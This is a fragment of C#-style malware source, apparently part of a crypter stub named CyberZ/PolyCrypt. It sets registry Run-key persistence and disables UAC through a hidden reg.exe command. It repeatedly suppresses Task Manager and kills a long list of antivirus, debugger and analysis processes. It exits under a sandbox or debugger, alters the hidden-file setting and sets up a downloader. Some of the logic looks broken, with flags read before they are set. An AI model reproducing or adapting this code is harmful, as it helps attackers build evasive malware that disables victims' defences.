private static bool CheckKey()
{
bool flag1, flag2;
string s1 = null;
MainClass.RegPersistence.R = Registry.CurrentUser.OpenSubKey(PolyCrypt.DecryptWithpOLYcRYPT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), true);
string[] sArr1 = MainClass.RegPersistence.R.GetValueNames();
MainClass.RegPersistence.R.Close();
string[] sArr2 = sArr1;
int i = 0;
while (flag2)
{
string s2 = sArr2[i];
s1 = s1 + s2 + PolyCrypt.DecryptWithpOLYcRYPT("WillDecrypt an |");
i = checked (i + 1);
flag2 = i < checked ((int)sArr2.Length);
}
flag2 = s1.Contains(MainClass.RegPersistence.MyValue);
if (flag2)
{
return(true);
}
else
{
return(false);
}
return(flag1);
}
public static void DisableTaskMnGR()
{
bool flag;
int i = Interaction.Shell(PolyCrypt.DecryptWithpOLYcRYPT("taskmgr.exe"), AppWinStyle.Hide, false, -1);
while (flag)
{
Process.GetProcessById(i).WaitForExit();
Thread.Sleep(50);
i = Interaction.Shell(PolyCrypt.DecryptWithpOLYcRYPT("taskmgr.exe"), AppWinStyle.Hide, false, -1);
flag = true;
}
}
public static void UACCCCJAJ()
{
Interaction.Shell(PolyCrypt.DecryptWithpOLYcRYPT("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"), AppWinStyle.Hide, false, -1);
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(PolyCrypt.DecryptWithpOLYcRYPT("SSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"), true);
bool flag1 = registryKey != null;
if (flag1)
{
bool flag2 = registryKey.GetValue(PolyCrypt.DecryptWithpOLYcRYPT("EnableLUA")) != null;
if (flag2)
{
registryKey.SetValue(PolyCrypt.DecryptWithpOLYcRYPT("EnableLUA"), PolyCrypt.DecryptWithpOLYcRYPT("000000000"));
}
}
}
catch (Exception e)
{
ProjectData.SetProjectError(e);
ProjectData.ClearProjectError();
}
}
public static void Antis28_IsHere()
{
bool flag;
int i3;
Process[] processArr = Process.GetProcesses();
try
{
int i2 = checked (checked ((int)processArr.Length) - 1);
int i1 = 0;
while (i1 <= i3)
{
string s = Strings.LCase(processArr[i1].ProcessName);
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("mcagent"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("mcuimgr"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("avgemc"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("a2servic"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("ashWebSv"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("clamauto"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("cpffffffffffffffffff"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("ewidowwwwwwww"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("FPAVServer"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("BullGuarddddddddddd"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("antigennnnnnnnn"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("ccapp"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("earthagent"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("tmlisten"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("pccntmon"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("spysweeperrrrrr"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("vmsrvc"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("vpcmap"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("acs.exe"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("apache.exe"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("bm38sp5.exe"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("vone.exe"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("ollydbgggg"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("wiresharkkkkk"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
else
{
flag = Operators.CompareString(s, PolyCrypt.DecryptWithpOLYcRYPT("mbammmmmmmmmm"), false) == 0;
if (flag)
{
processArr[i1].Kill();
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
i1 = checked (i1 + 1);
i3 = i2;
}
flag = checked ((int)Process.GetProcessesByName(PolyCrypt.DecryptWithpOLYcRYPT("SbieSvc")).Length) >= 1;
if (flag)
{
Environment.Exit(0);
}
flag = Process.GetCurrentProcess().MainModule.FileName.Contains(PolyCrypt.DecryptWithpOLYcRYPT("sampleeee"));
if (flag)
{
Environment.Exit(0);
}
}
catch (Exception e)
{
ProjectData.SetProjectError(e);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
}
static RegPersistence()
{
MainClass.RegPersistence.MyPath = MainClass.appdataSpecialFolder + PolyCrypt.DecryptWithpOLYcRYPT("Will Decrypt An \\") + PolyCrypt.DecryptWithpOLYcRYPT("trytrytry") + PolyCrypt.DecryptWithpOLYcRYPT("exeextencion.exe");
MainClass.RegPersistence.MyValue = PolyCrypt.DecryptWithpOLYcRYPT("%regnamee%");
}
static CyberZ_Options()
{
MainClass.CyberZ_Options.IsDebuggerPresentt = MainClass.CyberZ_Options.CreateAPI <MainClass.CyberZ_Options.IsDebuggerPresent>(PolyCrypt.DecryptWithpOLYcRYPT("Kernel32ParaEncryptar"), "");
}
public static void HideFilesOcult()
{
string s = PolyCrypt.DecryptWithpOLYcRYPT("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced");
MyProject.Computer.Registry.SetValue(s, PolyCrypt.DecryptWithpOLYcRYPT("HiddenAtribute"), PolyCrypt.DecryptWithpOLYcRYPT("000000000"), RegistryValueKind.DWord);
}
static Cyber_ZDownloader()
{
MainClass.Cyber_ZDownloader.tempFolder = Environment.GetEnvironmentVariable(PolyCrypt.DecryptWithpOLYcRYPT("tempvariabletodecrypt"));
}
